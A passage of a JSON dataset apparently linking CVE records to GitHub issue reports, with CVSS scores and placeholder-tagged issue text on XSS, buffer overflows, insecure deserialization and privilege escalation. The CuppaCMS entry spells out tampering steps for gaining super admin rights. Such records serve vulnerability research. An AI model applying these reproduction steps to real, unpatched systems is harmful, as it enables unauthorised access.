        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-3318",
        "Issue_Url_old": "https://github.com/zyx0814/dzzoffice/issues/173",
        "Issue_Url_new": "https://github.com/zyx0814/dzzoffice/issues/173",
        "Repo_new": "zyx0814/dzzoffice",
        "Issue_Created_At": "2021-01-27T12:58:49Z",
        "description": "Potential XSS Vulnerability. There is a potential XSS vulnerability in PATHTAG using the 'editorid' parameter.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-33185",
        "Issue_Url_old": "https://github.com/SerenityOS/serenity/issues/7073",
        "Issue_Url_new": "https://github.com/serenityos/serenity/issues/7073",
        "Repo_new": "serenityos/serenity",
        "Issue_Created_At": "2021-05-13T07:29:03Z",
        "description": "Tests: APITAG has heap buffer overflow in set_range test. The set_range test in APITAG overflows the allocated bitmap in APITAG CODETAG APITAG APITAG Test run with ASAN backtrace APITAG ERRORTAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-33186",
        "Issue_Url_old": "https://github.com/SerenityOS/serenity/issues/7072",
        "Issue_Url_new": "https://github.com/serenityos/serenity/issues/7072",
        "Repo_new": "serenityos/serenity",
        "Issue_Created_At": "2021-05-13T07:24:04Z",
        "description": "Tests: test crypto has stack buffer overflow when AES encrypting NUMBERTAG octets. This test causes a stack buffer overflow in the in array of NUMBERTAG bytes: CODETAG APITAG APITAG Test run details with ASAN backtrace APITAG ERRORTAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-3325",
        "Issue_Url_old": "https://github.com/mikaku/Monitorix/issues/309",
        "Issue_Url_new": "https://github.com/mikaku/monitorix/issues/309",
        "Repo_new": "mikaku/monitorix",
        "Issue_Created_At": "2021-01-26T03:36:09Z",
        "description": "Not asking for password and can't connect to psql. Hi. I followed this tutorial URLTAG After setting up everything I found that when I go the built in server it never asks for a password even thought I set it. I did change APITAG and also created the password using APITAG Then I tried setting up postgres by enabling the graph and changing the database name, user and password which lead to me having to install DBD::Pg module. After all this I check the logs and it shows: ERRORTAG ERRORTAG Thanks Nuno",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-33347",
        "Issue_Url_old": "https://github.com/JPressProjects/jpress/issues/152",
        "Issue_Url_new": "https://github.com/jpressprojects/jpress/issues/152",
        "Repo_new": "jpressprojects/jpress",
        "Issue_Created_At": "2021-05-12T12:06:12Z",
        "description": "There is a storage XSS vulnerability in the template module. There is a storage XSS vulnerability in the template module. The figure shows the setting interface of template management, which is used to describe the left part of the home page. URL: APITAG FILETAG However, if hackers enter the background by means of weak password and add XSS code, they can easily cause great harm: Hijacking cookies, obtaining sensitive information, phishing and so on.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-33348",
        "Issue_Url_old": "https://github.com/jfinal/jfinal/issues/188",
        "Issue_Url_new": "https://github.com/jfinal/jfinal/issues/188",
        "Repo_new": "jfinal/jfinal",
        "Issue_Created_At": "2021-05-13T02:04:35Z",
        "description": "There are XSS vulnerabilities in some cases. The main reason is that the controller does not filter the parameters during rendering, which leads to malicious input of users and may lead to XSS APITAG FILETAG I wrote a demo: Controller CODETAG FILETAG APITAG If the user's input is output directly, XSS will be caused after the controller's set method is set. If the malicious parameters of controller are taken from the database, XSS vulnerability will be stored Repair The APITAG should be judged before the set method calls APITAG . If it is in string format, the harmful characters should be filtered, such as APITAG CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-33361",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1782",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1782",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-05-08T05:12:31Z",
        "description": "FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-33362",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1780",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1780",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-05-08T05:09:01Z",
        "description": "FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-33363",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1786",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1786",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-05-08T05:17:05Z",
        "description": "FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-33364",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1783",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1783",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-05-08T05:13:43Z",
        "description": "FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-33365",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1784",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1784",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-05-08T05:14:42Z",
        "description": "FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-3337",
        "Issue_Url_old": "https://github.com/snlbaral/Hide-Thread-Content/issues/1",
        "Issue_Url_new": "https://github.com/snlbaral/hide-thread-content/issues/1",
        "Repo_new": "snlbaral/hide-thread-content",
        "Issue_Created_At": "2021-01-27T22:34:32Z",
        "description": "Hidden content visible without replying. Hidden thread content is able to be viewed without replying by using the _reply_ or _quote_ button located in the postbit. By clicking either two buttons you can view the thread content in the APITAG brackets without having to actually reply. Example: FILETAG A solution would be to add a custom message inside the quote brackets for users who haven't replied that way thread content isn't revealed. Example: APITAG ERRORTAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-33430",
        "Issue_Url_old": "https://github.com/numpy/numpy/issues/18939",
        "Issue_Url_new": "https://github.com/numpy/numpy/issues/18939",
        "Repo_new": "numpy/numpy",
        "Issue_Created_At": "2021-05-07T18:30:11Z",
        "description": "Potential buffer overflow in APITAG of ctors.c. APITAG Reproducing code example: Snippet : APITAG int nd ,......) { ............... if (descr >subarray) { APITAG ret; npy_intp newdims FILETAG Possible call path NUMBERTAG array_new > APITAG NUMBERTAG APITAG > APITAG NUMBERTAG array_fromfile > APITAG > APITAG APITAG version information: The main branch of APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 3.6,
        "exploitabilityScore": 1.6
    },
    {
        "CVE_ID": "CVE-2021-33473",
        "Issue_Url_old": "https://github.com/markevans/dragonfly/issues/513",
        "Issue_Url_new": "https://github.com/markevans/dragonfly/issues/513",
        "Repo_new": "markevans/dragonfly",
        "Issue_Created_At": "2021-04-28T23:40:59Z",
        "description": "Security Issue Report. Hello, we have discovered a security issue within this project. Do you have a preferred security contact that we could reach out to discuss this issue? Thank you very much!",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-3355",
        "Issue_Url_old": "https://github.com/eddy8/LightCMS/issues/18",
        "Issue_Url_new": "https://github.com/eddy8/lightcms/issues/18",
        "Repo_new": "eddy8/lightcms",
        "Issue_Created_At": "2021-01-26T06:15:44Z",
        "description": "Stored XSS in \"exclusive\" field APITAG Description There's no escape being done before printing out the value of noun \u3001 verb \u3001 exclusive in the APITAG page. APITAG version NUMBERTAG Steps to reproduce Navigate to URLTAG & add the below shared payload as the exclusive field value. Payload ERRORTAG Visit page URLTAG the payload will be triggered. FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-33558",
        "Issue_Url_old": "https://github.com/mdanzaruddin/CVE-2021-33558./issues/1",
        "Issue_Url_new": "https://github.com/mdanzaruddin/cve-2021-33558./issues/1",
        "Repo_new": "mdanzaruddin/cve-2021-33558.",
        "Issue_Created_At": "2021-06-01T21:18:29Z",
        "description": "clarify this \"vulnerability\"?. Can you clarify this report? The files you mention are not part of the Boa NUMBERTAG distribution: FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-33570",
        "Issue_Url_old": "https://github.com/Paxa/postbird/issues/132",
        "Issue_Url_new": "https://github.com/paxa/postbird/issues/132",
        "Repo_new": "paxa/postbird",
        "Issue_Created_At": "2021-05-25T13:48:21Z",
        "description": "Security Vulnerability FILETAG team has found the XSS vulnerability in the Postbird application version NUMBERTAG The vulnerability was very Critical and exploiting the vulnerability can lead to Data Breach. We were able to inject malicious APITAG into the application, leading us to two other vulnerabilities, Local File Inclusion(LFI) and APITAG Password Stealing. Proof of Concept Code & detailed vulnerability report could be find here: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-33570",
        "Issue_Url_old": "https://github.com/Paxa/postbird/issues/133",
        "Issue_Url_new": "https://github.com/paxa/postbird/issues/133",
        "Repo_new": "paxa/postbird",
        "Issue_Created_At": "2021-05-25T13:51:01Z",
        "description": "Security Vulnerability FILETAG team has found the LFI vulnerability in the Postbird application version NUMBERTAG The vulnerability was very Critical and exploiting the vulnerability can lead to Data Breach. Using this vulnerability we can steal any file located on Postbird application users computer. Proof of Concept Code & detailed vulnerability report could be find here: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-33570",
        "Issue_Url_old": "https://github.com/Paxa/postbird/issues/134",
        "Issue_Url_new": "https://github.com/paxa/postbird/issues/134",
        "Repo_new": "paxa/postbird",
        "Issue_Created_At": "2021-05-25T13:53:33Z",
        "description": "Security Vulnerability FILETAG team has found a vulnerability in the Postbird application version NUMBERTAG The vulnerability was very Critical and exploiting the vulnerability can lead to APITAG password breach. Using this vulnerability a hacker can steal all APITAG password saved in your Postbird application. Proof of Concept Code & detailed vulnerability report could be find here: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-33590",
        "Issue_Url_old": "https://github.com/labapart/gattlib/issues/219",
        "Issue_Url_new": "https://github.com/labapart/gattlib/issues/219",
        "Repo_new": "labapart/gattlib",
        "Issue_Created_At": "2021-05-27T07:57:08Z",
        "description": "stack_based buffer. Hi Team, Stack based buffer overflow is observed in FILETAG and FILETAG while fuzzing GATTLIB using CLANG with AFL FUZZER Vulnerable code from read_write.c connection = gattlib_connect(NULL, arg NUMBERTAG APITAG if (connection == NULL) { fprintf(stderr, APITAG to connect to the bluetooth APITAG return NUMBERTAG ulnerable code from gattlib.c // Transform string from 'DA NUMBERTAG E NUMBERTAG to 'dev_DA NUMBERTAG E NUMBERTAG strncpy(device_address_str, mac_address, sizeof(device_address_str)); for (int i NUMBERTAG i APITAG mkdir build && cd build cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address fsanitize=leak g\" DCMAKE_C_FLAGS=\" fsanitize=address fsanitize=leak g\" make PATHTAG APITAG read NUMBERTAG a NUMBERTAG f9b NUMBERTAG fb ASAN output Failed to get adapter PATHTAG Error calling APITAG for APITAG Timeout was reached APITAG NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG ffc NUMBERTAG cd4d NUMBERTAG at pc NUMBERTAG efb9 bp NUMBERTAG ffc NUMBERTAG cd4d NUMBERTAG sp NUMBERTAG ffc NUMBERTAG cd NUMBERTAG READ of size NUMBERTAG at NUMBERTAG ffc NUMBERTAG cd4d NUMBERTAG thread T NUMBERTAG efb8 in strlen ( PATHTAG NUMBERTAG fb3c NUMBERTAG c NUMBERTAG in get_device_path_from_mac PATHTAG NUMBERTAG fb3c NUMBERTAG c NUMBERTAG in gattlib_connect PATHTAG NUMBERTAG c NUMBERTAG b in main PATHTAG NUMBERTAG fb3c NUMBERTAG e0b2 in __libc_start_main PATHTAG NUMBERTAG c NUMBERTAG d in _start ( PATHTAG ) Address NUMBERTAG ffc NUMBERTAG cd4d NUMBERTAG is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG fb3c NUMBERTAG c2bf in gattlib_connect PATHTAG This frame has NUMBERTAG object(s NUMBERTAG device_address_str.i' (line NUMBERTAG APITAG NUMBERTAG b NUMBERTAG f2 f2 f2 f2 f NUMBERTAG f2 f2 f NUMBERTAG c NUMBERTAG f3 f3 f3 f3 f3 f3 f NUMBERTAG d NUMBERTAG e NUMBERTAG f1 f1 f1 f NUMBERTAG f NUMBERTAG f2 f2 f2 f8 f2 f2 f2 f8 f8 f8 f8 f8 f2 f2 f NUMBERTAG a NUMBERTAG f2 f2 f8 f8 f8 f8 f8 f3 f3 f3 f3 f NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc NUMBERTAG ABORTING Request team to implement proper patch and validate",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-3376",
        "Issue_Url_old": "https://github.com/CuppaCMS/CuppaCMS/issues/12",
        "Issue_Url_new": "https://github.com/cuppacms/cuppacms/issues/12",
        "Repo_new": "cuppacms/cuppacms",
        "Issue_Created_At": "2021-01-30T18:04:55Z",
        "description": "Privilege Escalation Vulnerability due to the session validation weakness. Description: Privilege Escalation Vulnerability due to the session validation weakness The Profile function in APITAG before NUMBERTAG Jan NUMBERTAG has a privilege escalation vulnerability due to the session validation weakness. Attacker could escalate their privilege to Super Admin by tampering the HTTP Request, then to obtain full control of the APITAG Proof of Concept Step NUMBERTAG Access the profile function with a low privilege account FILETAG Step NUMBERTAG Add the user_group_id_field as one of the POST parameter, and set the value to NUMBERTAG Original Request FILETAG Edited Request: added the \"user_group_id_field\" parameter as highlighted FILETAG Response NUMBERTAG means successfully updated the record FILETAG Step NUMBERTAG Re login the account, and obtained super admin privilege FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-33889",
        "Issue_Url_old": "https://github.com/openthread/wpantund/issues/502",
        "Issue_Url_new": "https://github.com/openthread/wpantund/issues/502",
        "Repo_new": "openthread/wpantund",
        "Issue_Created_At": "2021-06-28T03:56:19Z",
        "description": "stack buffer overflow in metric_len . Context: Stack buffer overflow may be triggered while writing to a variable metric_len, which is defined as unsigned short (ref: URLTAG but is considered as unsigned int (ref: URLTAG Expected behavior and actual behavior: Expected Behavior: Trigger an exception, because size of buffer needed, is not available. Actual Behavior: The metric_len variable triggers stack buffer overflow. Version Details: The issue was first found in wpantund: APITAG Affected commits: APITAG to APITAG CVE CVETAG APITAG",
        "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.8,
        "impactScore": 5.9,
        "exploitabilityScore": 0.9
    },
    {
        "CVE_ID": "CVE-2021-33898",
        "Issue_Url_old": "https://github.com/invoiceninja/invoiceninja/issues/5909",
        "Issue_Url_new": "https://github.com/invoiceninja/invoiceninja/issues/5909",
        "Repo_new": "invoiceninja/invoiceninja",
        "Issue_Created_At": "2021-06-03T12:44:38Z",
        "description": "Insecure deserialization versions NUMBERTAG What version of Invoice Ninja are you running NUMBERTAG and below What environment are you running? N/A Have you checked log files ( PATHTAG ) Please provide redacted output N/A Have you searched existing issues? Yes Have you reported this to Slack/forum before posting? No Describe the bug In versions NUMBERTAG and below of APITAG there is an unsafe call to APITAG in ERRORTAG which may allow an attacker to deserialize arbitrary PHP classes. In certain contexts this can result in remote code execution. The argument to unserialize is the output from a HTTP call to APITAG . This is without encryption. Attack vectors are then NUMBERTAG Malicious deserialized object from geoplugin.net NUMBERTAG MITM attack between the invoiceninja service and geoplugin.net Expected behavior Use JSON instead of native PHP objects for untrusted input. Additional context The responsible code is now commented out since APITAG URLTAG , however there is a note about triaging GDPR implications before reintroduction of the code block, so this may be introduced in future versions.",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2021-33928",
        "Issue_Url_old": "https://github.com/openSUSE/libsolv/issues/417",
        "Issue_Url_new": "https://github.com/opensuse/libsolv/issues/417",
        "Repo_new": "opensuse/libsolv",
        "Issue_Created_At": "2020-12-13T06:03:06Z",
        "description": "libsolv APITAG function a heap overflow vulnerability. \u201cpool_disabled_solvable\u201d function a heap overflow vulnerability \u201cpool_installable\u201d function a heap overflow vulnerability APITAG function a heap overflow vulnerability Description: There are three heap buffer overflow bugs in function: static inline int pool_disabled_solvable(const Pool pool, Solvable s) static inline int pool_installable(const Pool pool, Solvable s) static inline int APITAG Pool pool, Solvable s) at src/repo.h: line NUMBERTAG line NUMBERTAG and line NUMBERTAG The statement of these three lines are same, as follows: if (!MAPTST(pool >considered, id)) The program defines \u201cMAPTST(m, n)\u201d that \u201c((m) >map (n NUMBERTAG n NUMBERTAG MAPTST(pool >considered, id) is same as pool >considered >map[id NUMBERTAG id NUMBERTAG This statement involves pool >considered >map[id NUMBERTAG The variable pool >considered is a Map structure pointer. The Map structure as following: typedef struct APITAG { unsigned char map; int size; } Map; If the index value \u201cid NUMBERTAG is bigger than pool >considered >size, there is a heap overflow bug. Please reproduce this issue through the following APITAG PATHTAG APITAG pool_disabled_solvable line NUMBERTAG URLTAG If you configure CC with flag fsanitize=address, you will get the following outputs: testcase_read: cannot parse command 'D' disable: unknown package 'E NUMBERTAG src APITAG disable: unknown package 'F NUMBERTAG src APITAG test NUMBERTAG test NUMBERTAG str2job: unknown selection flag 'b' testcase_read: cannot parse command 'repo' test NUMBERTAG Results differ: job noop name (A . i NUMBERTAG setarch] APITAG APITAG heap buffer overflow on address NUMBERTAG f1 at pc NUMBERTAG f0ef3b NUMBERTAG cc bp NUMBERTAG fffcdcb NUMBERTAG sp NUMBERTAG fffcdcb NUMBERTAG READ of size NUMBERTAG at NUMBERTAG f1 thread T NUMBERTAG f0ef3b NUMBERTAG cb in pool_disabled_solvable PATHTAG NUMBERTAG f0ef3b NUMBERTAG cb in APITAG PATHTAG NUMBERTAG f0ef3b NUMBERTAG cb in selection_name PATHTAG NUMBERTAG f0ef3b NUMBERTAG in selection_name_arch PATHTAG NUMBERTAG f0ef3b NUMBERTAG in selection_name_arch_rel PATHTAG NUMBERTAG f0ef3b NUMBERTAG in selection_make PATHTAG NUMBERTAG f0efce NUMBERTAG e in addselectionjob PATHTAG NUMBERTAG f0efce NUMBERTAG cc6 in testcase_read PATHTAG NUMBERTAG f NUMBERTAG b in main PATHTAG NUMBERTAG f0ef NUMBERTAG f5bf6 in __libc_start_main PATHTAG NUMBERTAG e6f9 in _start ( PATHTAG NUMBERTAG f1 is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG abe NUMBERTAG in calloc PATHTAG NUMBERTAG f0ef3a NUMBERTAG f NUMBERTAG in solv_calloc PATHTAG NUMBERTAG f0ef NUMBERTAG ccdba in map_init PATHTAG NUMBERTAG f0efce NUMBERTAG a in testcase_read PATHTAG NUMBERTAG f NUMBERTAG b in main PATHTAG NUMBERTAG f0ef NUMBERTAG f5bf6 in __libc_start_main PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in pool_disabled_solvable Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff7fc NUMBERTAG c NUMBERTAG fff7fd NUMBERTAG c NUMBERTAG fff7fe NUMBERTAG c NUMBERTAG fff7ff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa fd fd fa fa NUMBERTAG fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fa fa fd fa fa fa fd fa fa fa fd fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fa fa fa fd fd fa fa fd fd fa fa fd fd NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fa fa fd fa fa fa fd fa fa fa fd fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fa fa fa fd fa fa fa fd fd fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa fd fd Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-33938",
        "Issue_Url_old": "https://github.com/openSUSE/libsolv/issues/420",
        "Issue_Url_new": "https://github.com/opensuse/libsolv/issues/420",
        "Repo_new": "opensuse/libsolv",
        "Issue_Created_At": "2020-12-13T06:13:26Z",
        "description": "libsolv \u201cprune_to_recommended\u201d function two heap overflow vulnerabilities. Description: There are two heap buffer overflow vulnerabilities in static void APITAG solv, Queue plist) at src/policy.c: line NUMBERTAG line NUMBERTAG FOR_PROVIDES(p, pp, rec) MAPSET(&solv >recommendsmap, p); // line NUMBERTAG The first case, it involves variable \u201csolv >recommendsmap\u201d. The libsolv defines MAPSET as following: define MAPSET(m, n) ((m) >map (n NUMBERTAG n NUMBERTAG Therefore, MAPSET(&solv >recommendsmap, p) involves the variable \u201csolv >recommendsmap >map[p NUMBERTAG The type of the variable \u201csolv >recommendmap\u201d is the structure Map. The Map structure defines as following: typedef struct APITAG { unsigned char map; int size; } Map; If the value of the index variable \u201cp NUMBERTAG is bigger than \u201csolv >recommendmap >size\u201d, there will be a heap buffer overflow bug. if (!MAPTST(&solv >recommendsmap, p)) // line NUMBERTAG The libsolv defines MAPTST as following: define MAPTST(m, n) ((m) >map[(n NUMBERTAG n NUMBERTAG Therefore, the variable \u201cMAPTST(&solv >recommendsmap, p)\u201d is same with \u201csolv >recommendmap >map[p NUMBERTAG APITAG }'DHA\udb0e\udf2deh\u00c9\u0626\udb41\udf3b testcase_read: cannot parse command APITAG NUMBERTAG u`N NUMBERTAG APITAG NUMBERTAG B\u94fb( \u0587,I NUMBERTAG A~)\u00b5\u714a\u00bc\u00adQ testcase_read: could not open PATHTAG APITAG alternative' APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG d1 at pc NUMBERTAG f2ba NUMBERTAG fb3c bp NUMBERTAG ffc4dab NUMBERTAG sp NUMBERTAG ffc4dab NUMBERTAG READ of size NUMBERTAG at NUMBERTAG d1 thread T0 APITAG NUMBERTAG f2ba NUMBERTAG fb3b in policy_update_recommendsmap PATHTAG NUMBERTAG f2ba NUMBERTAG fb3b in prune_to_recommended PATHTAG NUMBERTAG f2ba NUMBERTAG fb3b in policy_filter_unwanted PATHTAG NUMBERTAG f2ba NUMBERTAG d in resolve_dependencies PATHTAG NUMBERTAG f2ba NUMBERTAG faba4 in solver_run_sat PATHTAG NUMBERTAG f2ba NUMBERTAG a in solver_solve PATHTAG NUMBERTAG f1eea in main PATHTAG NUMBERTAG f2b9f NUMBERTAG cbf6 in __libc_start_main PATHTAG NUMBERTAG e6f9 in _start ( PATHTAG NUMBERTAG d1 is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG abe NUMBERTAG in calloc PATHTAG NUMBERTAG f2ba NUMBERTAG f NUMBERTAG in solv_calloc PATHTAG NUMBERTAG f2ba NUMBERTAG e3dba in map_init PATHTAG NUMBERTAG f2ba NUMBERTAG f1abe in solver_create PATHTAG NUMBERTAG f2ba9da NUMBERTAG d4 in testcase_read PATHTAG NUMBERTAG f NUMBERTAG b in main PATHTAG NUMBERTAG f2b9f NUMBERTAG cbf6 in __libc_start_main PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in policy_update_recommendsmap Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff7fc NUMBERTAG c NUMBERTAG fff7fd NUMBERTAG c NUMBERTAG fff7fe NUMBERTAG c NUMBERTAG fff7ff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa fd fa fa fa fd fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack 